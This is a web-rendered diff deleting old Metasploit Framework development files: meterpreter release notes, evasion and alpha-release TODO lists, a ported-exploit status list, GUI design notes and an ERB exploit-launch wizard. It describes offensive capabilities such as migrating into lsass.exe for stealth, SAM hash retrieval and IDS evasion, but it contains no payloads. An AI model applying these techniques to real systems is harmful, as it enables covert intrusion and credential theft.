||||
system, registry, network, threads, processes, user interface, and much more.
|
||||
Some of the cooler features of the new version of meterpreter include:
|
||||
|
||||
- In-memory process migration
|
||||
|
||||
This feature makes it possible to migrate the meterpreter server instance to
|
||||
a completely different process, such as a system service like lsass.exe,
|
||||
without having to establish a new connection. This means that if you
|
||||
exploit an HTTP server and re-use the port 80 connection for the meterpreter
|
||||
session, then it's possible to appear almost completely transparent due to
|
||||
the elimination of the need to create a new connection. Furthermore,
|
||||
migrating to a privileged process has the added benefit of making the server
|
||||
impossible to kill without taking down the whole machine.
|
||||
|
||||
- Disabling user keyboard and mouse input
|
||||
|
||||
This feature makes it possible to prevent local keyboard and mouse input.
|
||||
|
||||
- SAM database hash retrieval
|
||||
|
||||
The SAM juicer extension that Vinnie Liu authored has been integrated into a
|
||||
more generalized privilege escalation extension known as 'priv'. In the
|
||||
future, this extension will provide local privilege escalation exploits.
|
||||
|
||||
- Advanced process manipulation
|
||||
|
||||
The 3.0 version of meterpreter has extensive support for interacting with
|
||||
processes in terms of loading and unloading DLLs; reading, writing,
|
||||
querying, allocating, and freeing memory; opening, creating, closing,
|
||||
terminating, suspending, querying, and modifying threads; writing, and
|
||||
reading standard input output, and so on.
|
||||
|
||||
- IRB mode
|
||||
|
||||
This feature is especially cool for all of the scripters out there. It
|
||||
allows a user to drop into an interactive ruby shell that can be used to use
|
||||
meterpreter at the scripting level rather than at the user-interface level.
|
||||
This can be very useful because the scripting level features are far more
|
||||
powerful and featureful than the user-interface.
|
||||
|
||||
- Network pivoting
|
||||
|
||||
Like other products, the 3.0 version of the framework supports seamless
|
||||
pivoting through meterpreter. The 2.x branch of the framework had very
|
||||
minimal support for this feature, but the 3.0 version is planned to have
|
||||
much more robust support.
|
||||
|
||||
This release is meant to serve as a method of getting feedback and
|
||||
correcting bugs prior to entering a true beta period. There are many features
|
||||
that have not been completely implemented at this point and there are still some
|
||||
edges that will need to be roughed out prior to the final release. Some of the
|
||||
major features that have not been completed are:
|
||||
|
||||
- Native Windows support (due to interpreter issues)
|
||||
- msfweb exploit and session interfaces
|
|
@ -1,21 +0,0 @@
|
|||
evasion
|
||||
- new command: 'evasion'
|
||||
- -l, list evasion subsystems
|
||||
- set evasion subsystem level
|
||||
- get evasion subsystem level
|
||||
- set global evasion level
|
||||
- get global evasion level
|
||||
- modules cache evasion level at creation time
|
||||
- modules pass evasion flags onto sockets via params
|
||||
- sockets and protocols register subsystems
|
||||
- sockets to take passed evasion level in precedence over subsystem/global
|
||||
- consider http evasion
|
||||
- random headers
|
||||
- consider EvasionLevel advanced option on all exploits
|
||||
|
||||
misc
|
||||
- session sharing through multiplexing
|
||||
|
||||
recon
|
||||
- track exploit success, failure, host information
|
||||
- support searching the knowledge base
|
|
@ -1,35 +0,0 @@
|
|||
<b>Scheduled alpha preview release:</b> December 15th, 2005<br/>
|
||||
<br/>
|
||||
Metasploit 3.0 is the next generation of the Metasploit Framework. It is written
|
||||
in the <a href="http://www.ruby-lang.org/">Ruby</a> programming language.
|
||||
As it stands, the 2.0 branch has made it possible to drastically reduce the
|
||||
amount of time it takes to implement an exploit with the added benefit of making
|
||||
it possible to re-use large amounts of code between various exploits. The
|
||||
extensible model through which payloads, encoders, NOP generators, and exploits
|
||||
can be integrated has made it possible to use the Metasploit Framework as an
|
||||
outlet for cutting-edge exploitation research.<br/>
|
||||
<br/>
|
||||
In this light, the 3.0 version is being planned to help continue to evolve
|
||||
the field of exploitation research and exploitation frameworks in general.
|
||||
The primary goals of the 3.0 version are listed below:<br/>
|
||||
<ul>
|
||||
<li>To improve automation of exploitation through scripting
|
||||
<li>To simplify the process of writing an exploit
|
||||
<li>To increase code re-use between exploits
|
||||
<li>To improve and generically integrate evasion techniques
|
||||
<li>To support automated network discovery and event correlation through <i>recon</i> modules
|
||||
<li>To continue to provide a friendly outlet to cutting edge exploitation technology
|
||||
</ul>
|
||||
As we get closer to the preview release date, we will begin posting design
|
||||
documentation and other information that will allow the community to assess
|
||||
the new architecture and provide feedback. The preview release will simply
|
||||
be used as a milestone by which the public can help us to gauge how much
|
||||
work remains until we feel comfortable that we have a finished product.<br/>
|
||||
<br/>
|
||||
In the meantime, here are some screenshots of the 3.0 release in development. Nothing
|
||||
too fancy at this point, but it highlights some of the upcoming changes.<br/>
|
||||
<br/>
|
||||
<a href="http://www.hick.org/~mmiller/msf3/pics">Metasploit 3.0 Preview Screenshots</a>
|
||||
<br/>
|
||||
<br/>
|
||||
- Metasploit Staff
|
|
@ -1,130 +0,0 @@
|
|||
The following things are required for the December alpha release:
|
||||
|
||||
|
||||
- rex
|
||||
X - post-exploitation
|
||||
X - meterpreter
|
||||
X - pivoting
|
||||
X - portfwd command
|
||||
- networking
|
||||
X - switch board routing table for pivoting
|
||||
X - meterpreter 'comm' support
|
||||
- proxy 'comm' support
|
||||
- asm
|
||||
- block dependencies (req'd for shikata)
|
||||
- block permutation generation (req'd for shikata)
|
||||
X - text
|
||||
X - create_pattern, pattern_offset
|
||||
X - base64
|
||||
X - consider extending String
|
||||
X - logging
|
||||
X - debug level limiter
|
||||
X - define log levels, when they should be used, etc
|
||||
- framework-core
|
||||
X - modules
|
||||
X - reloading
|
||||
X - compatibility filtering (keys)
|
||||
X - description sanitation (strip lines/etc)
|
||||
X - payloads
|
||||
X - meta information
|
||||
X - stager/stage calling conventions
|
||||
X - stack requirements
|
||||
X - make payload prepend target specific
|
||||
X - sessions
|
||||
X - logging session activity
|
||||
- module load caching
|
||||
- switch to demand loaded modules rather than always loading
|
||||
- should make things faster
|
||||
X - recon
|
||||
X - add a method like 'can_be_used' that checks whether or not dependencies are
|
||||
X on the machine (like nmap) for a given module
|
||||
- framework task queuing
|
||||
- make the framework expose methods for queuing tasks (FrameworkTask)
|
||||
- generic interface with an execute method
|
||||
- called from within the context of a worker thread
|
||||
- modules needing ports (above other modules)
|
||||
- encoders
|
||||
- shikata
|
||||
X - nops
|
||||
X - opty2
|
||||
- payloads
|
||||
- cmd payloads
|
||||
X - mac os x payloads
|
||||
- osx null free reverse stager
|
||||
X - solaris payloads
|
||||
X - bsd payloads
|
||||
- user interfaces
|
||||
- general
|
||||
X - add concept of EVASION option (high, normal, low)
|
||||
X - logging improvements
|
||||
X - provide log file setting interface
|
||||
X - log by default in the LogDir
|
||||
X - msfcli
|
||||
- msfweb
|
||||
X - msfpayload
|
||||
X - msfencode
|
||||
- msfconsole
|
||||
- spawn web-server from within msfconsole (msfweb instance)
|
||||
- irb mode
|
||||
- running 'msf scripts'
|
||||
- testing framework
|
||||
- framework core
|
||||
X - handlers
|
||||
- framework modules
|
||||
- exploits
|
||||
- payloads
|
||||
X - encoders
|
||||
- osx encoders
|
||||
- nops
|
||||
- recon
|
||||
- framework sessions
|
||||
- shell
|
||||
- meterpreter
|
||||
- documentation
|
||||
- rex
|
||||
- framework-core
|
||||
- framework-base
|
||||
- module interfaces
|
||||
|
||||
The following things should be implemented both as protocols and as exploit
|
||||
mixins to encourage code re-use:
|
||||
|
||||
X - ftp
|
||||
- backup agent protocols
|
||||
- CA brightstor
|
||||
X - Arkeia
|
||||
X - mssql
|
||||
- sunrpc
|
||||
- xdr
|
||||
- jbase
|
||||
- oracle
|
||||
|
||||
Things that would be useful to have completed, but not a requirement:
|
||||
|
||||
- rex
|
||||
- exploitation
|
||||
- format string generator
|
||||
- opcodedb client (return addr pooling)
|
||||
- networking
|
||||
- msfd 'comm' support
|
||||
- modules
|
||||
- payloads
|
||||
- implement 'reliable' stagers with a higher rating so that
|
||||
if there is enough room, reliable stagers can be used
|
||||
- recon
|
||||
X - basic range/port scanner
|
||||
X - basic service identifier
|
||||
- basic OS fingerprinting
|
||||
- framework-core
|
||||
- handler sharing
|
||||
- exploits using the same payload/handler can share (ref count)
|
||||
- plugin modules
|
||||
- plugin modules can extend the framework and provide new features
|
||||
X - framework-base
|
||||
X - event correlation
|
||||
X - recon events correlations
|
||||
- user interfaces
|
||||
- msfd
|
||||
- daemon interface, provides command line interaction and proxying
|
||||
- support authentication
|
||||
- support SSL
|
|
@ -1,8 +0,0 @@
|
|||
This file contains the list of exploits ported so far and their status:
|
||||
|
||||
Ported
|
||||
======
|
||||
|
||||
aim_goaway: Needs more testing, but hit on Windows XPSP0
|
||||
ie_objecttype: Slightly unstable, needs more testing, but functioning
|
||||
msrpc_dcom_ms03_026: re-exploitation fails, but otherwise working
|
|
@ -1,16 +0,0 @@
|
|||
Things to *not* do in ruby that will break ruby threads. This list
|
||||
isn't complete, but it's things I've noticed while working on stuff:
|
||||
|
||||
- select with no timeout
|
||||
|
||||
This will make a blocking select call that will block all other
|
||||
threads.
|
||||
|
||||
Use Rex::ThreadSafe::select
|
||||
|
||||
- use sleep
|
||||
|
||||
This will block all threads.
|
||||
|
||||
Use Rex::ThreadSafe::sleep (we've now wrapped the global sleep to
|
||||
call the rex sleep)
|
|
@ -1,14 +0,0 @@
|
|||
DynamicSehRecord
|
||||
- causes an exploit to generate a dynamic seh frame if it's an seh exploit
|
||||
|
||||
global
|
||||
======
|
||||
|
||||
SessionLogging (true/yes/1)
|
||||
- enables logging of sessions
|
||||
|
||||
ConsoleLogging (true/yes/1)
|
||||
- enables logging of the console
|
||||
|
||||
DisableAutoSubscribe (true/yes/1)
|
||||
- Disables the auto-subscription of modules to event provider interfaces.
|
|
@ -1,48 +0,0 @@
|
|||
Metasploit Framework MsfGUI TODO List
|
||||
=====================================
|
||||
|
||||
1 - Modify the signal-connect on the MyExploitTree class
|
||||
On Gtk::TreeView of this class, remove "one shot", just make it "execute", dont ask for RHOST
|
||||
the exploit shouldnt get listed in the One-Shot piece until its completed and running and it
|
||||
should be removed once the exploit finishes.
|
||||
=> DONE
|
||||
|
||||
|
||||
2 - Built the MSFLog with a Gtk::TextView
|
||||
the MSFLog needs to also contain the outpout of the exploits as they run
|
||||
So redirect the output User picks exploit, goes straight to wizard, they click Go
|
||||
exploit is added to the Targets list while its in running state
|
||||
(for background exploits like WMF, this will stay there until you manually kill it)
|
||||
when a new session is created, those are added automatically to the sessions list
|
||||
and the output of the exploits are sent to the MSFLogs window.
|
||||
Add some colours with tags
|
||||
=> DONE
|
||||
|
||||
3 - bind a signal-connect to a running exploit
|
||||
you can right click running exploits and kill them (this is technically a job)
|
||||
(right click from Targets)
|
||||
=> DONE
|
||||
|
||||
4 - session interaction
|
||||
needs a wider console, some little buttons for sending '^C' and stuff
|
||||
(maybe even a toggle for hex-mode)
|
||||
so when youre typing on a command shell and need to send like ^D to close out 'cat'
|
||||
also, sessions needs a right-click meny for 'Close'
|
||||
and some way to detect when a session is dead and remove it from the list
|
||||
ie. you type "exit" on the shell
|
||||
=> Partially done
|
||||
|
||||
5 - Preferences page
|
||||
Ton of stuff like binding all Databases stuff or adding preselected payloads user
|
||||
|
||||
6 - Exploit research
|
||||
I think there's a way to perform this feature :
|
||||
- register all child iters from the parent modules (Standart, Payloads, Encoders, ...) to an array
|
||||
- add a Gtk::Entry beside the TreeView or bind a Gtk::Dialog to a right click _Search
|
||||
- Once, the research return true, jump to the selected iter and perform the usual view
|
||||
=> DONE
|
||||
|
||||
|
||||
7 - the msfconsole
|
||||
A fun feature will be to plug the msfconsole to :
|
||||
the Gtk::NoteBook page or/and a dedicated windows/dialog
|
|
@ -1,86 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
# This is a basic irb interface using the Gtk2 GUI library
|
||||
#
|
||||
|
||||
msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__
|
||||
$:.unshift(File.join(File.dirname(msfbase), 'lib'))
|
||||
|
||||
require 'gtk2'
|
||||
require 'irb'
|
||||
require 'rex'
|
||||
|
||||
class Console < Gtk::Window
|
||||
|
||||
require 'rex/io/bidirectional_pipe'
|
||||
|
||||
@@offset = 0
|
||||
|
||||
def initialize
|
||||
super()
|
||||
|
||||
# Layout stuff
|
||||
set_default_size(500, 400)
|
||||
set_border_width(10)
|
||||
|
||||
# Skeleton ;-)
|
||||
vbox = Gtk::VBox.new(false, 5)
|
||||
add(vbox)
|
||||
|
||||
@buffer = Gtk::TextBuffer.new
|
||||
@textview = Gtk::TextView.new(@buffer)
|
||||
scrolled_window = Gtk::ScrolledWindow.new
|
||||
scrolled_window.add(@textview)
|
||||
vbox.pack_start(scrolled_window, true, true, 5)
|
||||
scrolled_window.set_policy(Gtk::POLICY_AUTOMATIC, Gtk::POLICY_AUTOMATIC)
|
||||
|
||||
signal_connect('destroy') do
|
||||
Gtk.main_quit
|
||||
end
|
||||
|
||||
signal_connect('key_press_event') do |edit, event|
|
||||
if event.keyval == Gdk::Keyval::GDK_Return
|
||||
catch_text
|
||||
end
|
||||
end
|
||||
|
||||
# Create the pipe interface
|
||||
@pipe = Rex::IO::BidirectionalPipe.new
|
||||
|
||||
# Start the session interaction
|
||||
@t_run = Thread.new do
|
||||
IRB.init_config(nil)
|
||||
IRB.conf[:USE_READLINE] = false
|
||||
IRB.init_error
|
||||
irb = IRB::Irb.new(IRB::WorkSpace.new())
|
||||
IRB.conf[:MAIN_CONTEXT] = irb.context
|
||||
irb.eval_input
|
||||
end
|
||||
|
||||
# Create a subscriber with a callback for the UI
|
||||
@sid = @pipe.create_subscriber_proc() do |data|
|
||||
@buffer.insert(@buffer.end_iter, Rex::Text.to_utf8(data))
|
||||
@buffer.move_mark('end_mark', @buffer.end_iter)
|
||||
@textview.scroll_mark_onscreen(@buffer.get_mark('end_mark'))
|
||||
end
|
||||
|
||||
show_all
|
||||
end
|
||||
|
||||
def put_text(text = nil)
|
||||
puts text if text
|
||||
end
|
||||
|
||||
def catch_text
|
||||
start = @buffer.get_iter_at_offset(@@offset)
|
||||
puts @buffer.get_text(nil, @buffer.end_iter)
|
||||
@buffer.insert(@buffer.end_iter,"\n")
|
||||
if (not @buffer.get_mark('end_mark'))
|
||||
@buffer.create_mark('end_mark', @buffer.end_iter, false)
|
||||
end
|
||||
@@offset = @buffer.end_iter.offset
|
||||
end
|
||||
end
|
||||
|
||||
Console.new
|
||||
Gtk.main
|
|
@ -1,6 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
require 'gtk2'
|
||||
|
||||
puts "Gtk+ v#{Gtk::MAJOR_VERSION}.#{Gtk::MINOR_VERSION}.#{Gtk::MICRO_VERSION}"
|
||||
puts "Ruby/GTK2 v#{Gtk::BINDING_VERSION.join(".")}"
|
122
dev/msfwx.txt
|
@ -1,122 +0,0 @@
|
|||
Metasploit Framework Wx GUI Design Document
|
||||
============================================
|
||||
|
||||
Code Layout
|
||||
===========
|
||||
|
||||
The 'msfwx' executable must be a wrapper around a Msf::UI class. The
|
||||
current code uses Msf::Ui::Wx::Driver as the backend.
|
||||
|
||||
The Driver must implement a constructor (initialize) that creates a
|
||||
framework instance and intializes the UI code.
|
||||
|
||||
The Driver must implement a method called 'run' which actually starts
|
||||
the GUI.
|
||||
|
||||
The actual GUI code should be stored in the lib/msf/ui/wx directory.
|
||||
|
||||
The Driver is responsible for loading any dependent UI code.
|
||||
|
||||
Wx uses the concept of an 'App' which has one or more 'Frames'.
|
||||
|
||||
The App should create the main Frame and configure the Menus.
|
||||
|
||||
The Frame should create all UI widgets, some of which can be
|
||||
defined and loaded from other files.
|
||||
|
||||
The event processing code can be placed into frame.rb, or loaded from
|
||||
another file, preferably separated out by functionality. The current
|
||||
code does a rather poor job of separating GUI layout from the actual
|
||||
processing code.
|
||||
|
||||
All constants should be placed into constants.rb in the lib/msf/ui/wx
|
||||
directory.
|
||||
|
||||
These are basic guidelines - if something doesn't make sense, feel free
|
||||
to change it.
|
||||
|
||||
|
||||
GUI Features
|
||||
============
|
||||
|
||||
The Wx GUI should support for the following basic features:
|
||||
|
||||
- List each module type and be able to filter based on search criteria
|
||||
|
||||
- Display information about any selected module, session, or job.
|
||||
|
||||
- Provide a tree view of all current hosts and all information about
|
||||
each detected host. The user should be able to modify and add items
|
||||
to the tree and apply modules to specific hosts and services in the
|
||||
tree view.
|
||||
|
||||
- List each active session (a successful exploitation result) and give
|
||||
the user the ability to interact with that session. I recommend using
|
||||
the current Sessions tab and listing each session in a treeview. When
|
||||
the user selects a session and double clicks, a new window will appear
|
||||
that gives them the ability to interact with the session. When the
|
||||
session interaction window is closed, the session should stay alive.
|
||||
The user should be able to terminate the session by selecting it from
|
||||
the list and hitting Delete or right clicking and using a pop-up menu.
|
||||
|
||||
In msfconsole, the session command is used to manage these.
|
||||
|
||||
|
||||
- List each active 'job'. A job is an exploit or auxiliary module that
|
||||
runs in the background. These modules can continue to produce data
|
||||
and sessions while the user does other things. Examples of passive
|
||||
exploits that create jobs are the browser exploits in:
|
||||
modules/exploits/windows/browser/
|
||||
|
||||
In msfconsole, the job command is used to manage these.
|
||||
|
||||
- Provide a way to configure and execute a selected, non-exploit/auxiliary
|
||||
module:
|
||||
a) Provide the ability to generate shellcode from a Payload
|
||||
b) Provide the ability to encode shellcode with an Encoder
|
||||
c) Provide the ability to generate nop sleds with a Nop
|
||||
|
||||
- Provide a way to configure and execute an exploit or auxiliary module
|
||||
a) Auxiliary modules will update the host information tree
|
||||
b) Exploit 'check' functions will update the host information tree
|
||||
c) Exploits can have their target system manualyl specified or selected
|
||||
from the host information tree. Selecting a host node will fill in
|
||||
the RHOST variable (if its supported) and selecting a service node
|
||||
under a host will fill in the RPORT variable if its supported.
|
||||
|
||||
|
||||
GUI Layout
|
||||
==========
|
||||
|
||||
The GUI is divided into three distinct areas. On the left hand side we have
|
||||
a set of tabs, each of which contains a list of things. This is where exploits,
|
||||
sessions, jobs, payloads, and encoders live. The current msfwx code should
|
||||
give you an idea of what I mean by this.
|
||||
|
||||
|
||||
The bottom section can be used to display information about the currently
|
||||
selected item (Information), the current debug log (output of print_status())
|
||||
from inside modules, results of exploit execution, other standard 'console'
|
||||
output, a mini-msfconsole that allows a subset of the normal commands to be used
|
||||
and provides shortcuts for manipulating GUI elements (remove all sessions,
|
||||
stop all jobs, run this exploit on all hosts, etc),
|
||||
|
||||
|
||||
The right panel of the interface will contain the list of hosts in a tree view,
|
||||
each host will also have a list of services, information entries, and other
|
||||
data collected and reported by the other modules.
|
||||
|
||||
When a module is selected, a screen needs to be provided to configure the module
|
||||
and start the execution. I have three ideas on this so far:
|
||||
|
||||
1) Make the right side consist of two tabs - one which has the host information
|
||||
and another which is used to show module exploits and launch the actual module.
|
||||
The thing that sucks about this is that if you want to see the host list while
|
||||
you configure the module, you have to switch between the two tabs.
|
||||
|
||||
2) Make the module configuration a new dialog window that pops up. This is
|
||||
the easier way and may end up being the cleanest way to implement this.
|
||||
|
||||
3) Move the list of hosts into the left-side tabs and then use the entire right
|
||||
side to configure and launch the selected module.
|
||||
|
|
@ -1,311 +0,0 @@
|
|||
<%= Msf::Ui::Web::Common.header(framework.version, 'exploits') %>
|
||||
<tr><td colspan='5'>
|
||||
|
||||
<%
|
||||
name = query_string['name']
|
||||
step = query_string['step'] || 0
|
||||
target = query_string['target']
|
||||
|
||||
step = step.to_i
|
||||
|
||||
if (name == nil)
|
||||
%>
|
||||
|
||||
<%# Display the exploit list if one hasn't been selected %>
|
||||
<br/>
|
||||
<div align='center' class='navHead'>
|
||||
<table class='moduleList' width='100%' cellspacing='0' border='0'>
|
||||
<% framework.exploits.each_module { |name, mod|
|
||||
modinst = mod.new
|
||||
%>
|
||||
<tr>
|
||||
<td class='moduleIcons' align='center'>
|
||||
<%= Msf::Ui::Web::Common.module_icons(modinst) %>
|
||||
</td>
|
||||
<td class='moduleName'>
|
||||
<a href="exploits.rhtml?name=<%= name %>"><%= modinst.name %></a>
|
||||
</td>
|
||||
<td class='moduleSpacer' colspan='2'>
|
||||
</td>
|
||||
</tr>
|
||||
<% } %>
|
||||
</table>
|
||||
</div>
|
||||
|
||||
<%# Wizard step 0 - target selection %>
|
||||
<%
|
||||
elsif (step == 0)
|
||||
modinst = framework.exploits.create(name)
|
||||
%>
|
||||
<br/>
|
||||
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
|
||||
<tr>
|
||||
<td class='moduleName'>
|
||||
<div class='textBold'><%= html_escape(modinst.name) %></div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
|
||||
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold'>Name:</td>
|
||||
<td class='textNormal'><%= html_escape(modinst.name) %></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold'>Authors:</td>
|
||||
<td class='textNormal'><%= html_escape(modinst.author.join("<br/>")) %></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold' valign='top'>Description:</td>
|
||||
<td colspan='2' class='textNormal' valign='top'>
|
||||
<%= html_escape(modinst.description) %>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold' valign='top'>References:</td>
|
||||
<td colspan='2' class='textNormal' valign='top'>
|
||||
<% modinst.references.each { |ref| %>
|
||||
<% if (ref.kind_of?(Msf::Module::SiteReference)) %>
|
||||
- <a href='<%= ref.site %>' target='_blank'><%= ref.to_s %></a><br/>
|
||||
<% else %>
|
||||
- <%= ref.to_s %><br/>
|
||||
<% end %>
|
||||
<% } %>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td align='right' width='80' class='textBold'>Targets:</td>
|
||||
<td class='textNormal'> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td>
|
||||
<table align='align' cellpadding='2' cellspacing='0' border='0'>
|
||||
<tr>
|
||||
<td class='textBold'>Target Name</td>
|
||||
<td class='textBold'>Platform</td>
|
||||
</tr>
|
||||
<% modinst.targets.each_with_index { |tgt, idx| %>
|
||||
<tr>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
|
||||
<%= idx %> - <a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= idx %>'><%= tgt.name %></a>
|
||||
</td>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
|
||||
<%= Msf::Ui::Web::Common.target_icons(tgt) %>
|
||||
</td>
|
||||
</tr>
|
||||
<% } %>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<%# Wizard step 1 - payload selection %>
|
||||
<%
|
||||
elsif (step == 1)
|
||||
modinst = framework.exploits.create(name)
|
||||
modinst.datastore['TARGET'] = query_string['target'].to_i
|
||||
%>
|
||||
<br/>
|
||||
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
|
||||
<tr>
|
||||
<td class='moduleName'>
|
||||
<div class='textBold'><%= html_escape(modinst.name) %></div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
|
||||
<table align='center' width='95%' cellspacing='0' cellpadding='6' border='0'>
|
||||
<tr>
|
||||
<td align='left' width='80' class='textBold'><nobr>Select Payload:</nobr></td>
|
||||
<td> </td>
|
||||
<td> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td class='textBold'>Name</td>
|
||||
<td class='textBold'>Description</td>
|
||||
</tr>
|
||||
|
||||
<% idx = 0
|
||||
modinst.compatible_payloads.each { |pname, pmod|
|
||||
pmodinst = pmod.new
|
||||
%>
|
||||
|
||||
<tr>
|
||||
<td> </td>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'>
|
||||
<a href='exploits.rhtml?name=<%= name %>&step=<%= step + 1 %>&target=<%= target %>&payload=<%= pname %>'><%= html_escape(pname) %></a>
|
||||
</td>
|
||||
<td class='textBoldColor<%= (idx % 2 == 0) ? "B" : "A" %>' align='left'><%= html_escape(pmodinst.description) %></td>
|
||||
</tr>
|
||||
|
||||
<% idx += 1
|
||||
}
|
||||
%>
|
||||
|
||||
</table>
|
||||
|
||||
<%# Wizard step 2 - option selection %>
|
||||
<% elsif (step == 2)
|
||||
payload = query_string['payload']
|
||||
modinst = framework.exploits.create(name)
|
||||
pinst = framework.payloads.create(payload)
|
||||
modinst.datastore['TARGET'] = query_string['target'].to_i
|
||||
%>
|
||||
<br/>
|
||||
<table width='100%' cellspacing='0' cellpadding='0' border='0'>
|
||||
<tr>
|
||||
<td class='moduleName'>
|
||||
<div class='textBold'><%= html_escape(modinst.name) %></div>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<br/>
|
||||
|
||||
<form method='GET'>
|
||||
<input type='hidden' name='eid' value="<%= Msf::Ui::Web::Driver::next_eid %>"/>
|
||||
<input type='hidden' name='name' value="<%= html_escape(name) %>"/>
|
||||
<input type='hidden' name='step' value="<%= step + 1 %>"/>
|
||||
<input type='hidden' name='target' value="<%= html_escape(modinst.datastore['TARGET']) %>"/>
|
||||
<input type='hidden' name='payload' value="<%= html_escape(payload) %>"/>
|
||||
|
||||
<table align='center' cellpadding='2' border='0' cellspacing='0' width='95%'>
|
||||
<%
|
||||
options = pinst.options.merge_sort(modinst.options)
|
||||
|
||||
options.each { |name, option|
|
||||
next if (option.advanced?)
|
||||
next if (option.evasion?)
|
||||
%>
|
||||
<tr>
|
||||
<td class='textBold'><%= name %></td>
|
||||
<td class='textBold'><%= (option.required?) ? "Required" : "Optional" %></td>
|
||||
<td class='textNormal'><%= option.type %></td>
|
||||
<td class='textNormal'>
|
||||
<input type='text' name="opt_<%= html_escape(name) %>" value="<%= html_escape(option.default || '') %>"/>
|
||||
</td>
|
||||
<td class='textNormal'><%= html_escape(option.desc) %></td>
|
||||
</tr>
|
||||
<% } %>
|
||||
|
||||
<tr><td colspan='5'> </td></tr>
|
||||
|
||||
<tr>
|
||||
<td colspan='3' class='textBold'>
|
||||
Preferred Encoder:<br/>
|
||||
<select name='encoder' size='1'>
|
||||
<option value='__default'>Default
|
||||
<% pinst.compatible_encoders.each { |encname, mod| %>
|
||||
<option><%= encname %>
|
||||
<% } %>
|
||||
</select>
|
||||
</td>
|
||||
<td colspan='2' class='textBold'>
|
||||
NOP Generator:<br/>
|
||||
<select name='nop' size='1'>
|
||||
<option value='__default'>Default
|
||||
<% pinst.compatible_nops.each { |nopname, mod| %>
|
||||
<option><%= nopname %>
|
||||
<% } %>
|
||||
</select>
|
||||
</td>
|
||||
</tr>
|
||||
|
||||
<tr><td colspan='5'> </td></tr>
|
||||
|
||||
<noscript>
|
||||
<input type='hidden' name='nojs' value="1"/>
|
||||
</noscript>
|
||||
|
||||
<tr>
|
||||
<td colspan='3' align='right'>
|
||||
<input type='submit' name='action' value='Check' class='button'/>
|
||||
</td>
|
||||
<td colspan='2' align='left'>
|
||||
<input type='submit' name='action' value='Exploit' class='button'/>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
|
||||
<%# Wizard step 3 - exploitation %>
|
||||
<%
|
||||
elsif (step == 3)
|
||||
|
||||
# Is JS disabled in the client's browser?
|
||||
nojs = query_string['nojs'] == '1' ? true : false
|
||||
|
||||
# Create the exploit instance
|
||||
modinst = framework.exploits.create(name)
|
||||
|
||||
# Set the encoder/nop to nil if it's not valid.
|
||||
query_string['encoder'] = nil if (query_string['encoder'] == '__default')
|
||||
query_string['nop'] = nil if (query_string['nop'] == '__default')
|
||||
|
||||
# Build the options string
|
||||
options = ''
|
||||
|
||||
query_string.each_pair { |k, v|
|
||||
next if v.nil? or v.length == 0
|
||||
|
||||
if k =~ /^opt_(.*)$/
|
||||
options += "#{$1}=#{v} "
|
||||
end
|
||||
}
|
||||
|
||||
# Use buffered output by default
|
||||
output = Rex::Ui::Text::Output::Buffer.new
|
||||
|
||||
# If we support javascript, then we'll use something better
|
||||
if nojs == false
|
||||
# TODO
|
||||
end
|
||||
|
||||
# Whether or not we should run this as a job
|
||||
as_job = modinst.passive? || (nojs == false)
|
||||
|
||||
# Kick off the exploit process
|
||||
error = false
|
||||
|
||||
begin
|
||||
modinst.exploit_simple(
|
||||
'Encoder' => query_string['encoder'],
|
||||
'Nop' => query_string['nop'],
|
||||
'Payload' => query_string['payload'],
|
||||
'Target' => query_string['target'].to_i,
|
||||
'OptionStr' => options,
|
||||
'LocalOutput' => output,
|
||||
'LocalInput' => nil,
|
||||
'RunAsJob' => as_job)
|
||||
rescue
|
||||
display = "<span style='font-weight: bold'><span style='color: red'>Error:</span> " + html_escape($!) + "</span>"
|
||||
error = true
|
||||
end
|
||||
|
||||
# Use the buffered output for display if we didn't fail.
|
||||
if error == false
|
||||
display = html_escape(output.buf).gsub(/\n/, "<br>")
|
||||
|
||||
if as_job
|
||||
display += "<br/><br/><span style='font-weight: bold'>Exploit is now running in the background.</span>"
|
||||
end
|
||||
end
|
||||
%>
|
||||
|
||||
<br/>
|
||||
<span style='font-weight: bold'>
|
||||
Launching exploit <%= modinst.refname %> ...
|
||||
</span>
|
||||
<br/><br/>
|
||||
|
||||
<%= display %>
|
||||
|
||||
<% else %>
|
||||
Unknown step: <%= html_escape(step) %>
|
||||
<% end %>
|
||||
|
||||
</td></tr>
|
||||
<%= Msf::Ui::Web::Common.footer %>
|
Before Width: | Height: | Size: 326 B |
Before Width: | Height: | Size: 186 B |
Before Width: | Height: | Size: 977 B |
Before Width: | Height: | Size: 944 B |
Before Width: | Height: | Size: 185 B |
Before Width: | Height: | Size: 595 B |
Before Width: | Height: | Size: 884 B |
Before Width: | Height: | Size: 216 B |
Before Width: | Height: | Size: 197 B |
Before Width: | Height: | Size: 571 B |
Before Width: | Height: | Size: 65 KiB |
Before Width: | Height: | Size: 77 B |
Before Width: | Height: | Size: 155 B |
Before Width: | Height: | Size: 229 B |
Before Width: | Height: | Size: 1.0 KiB |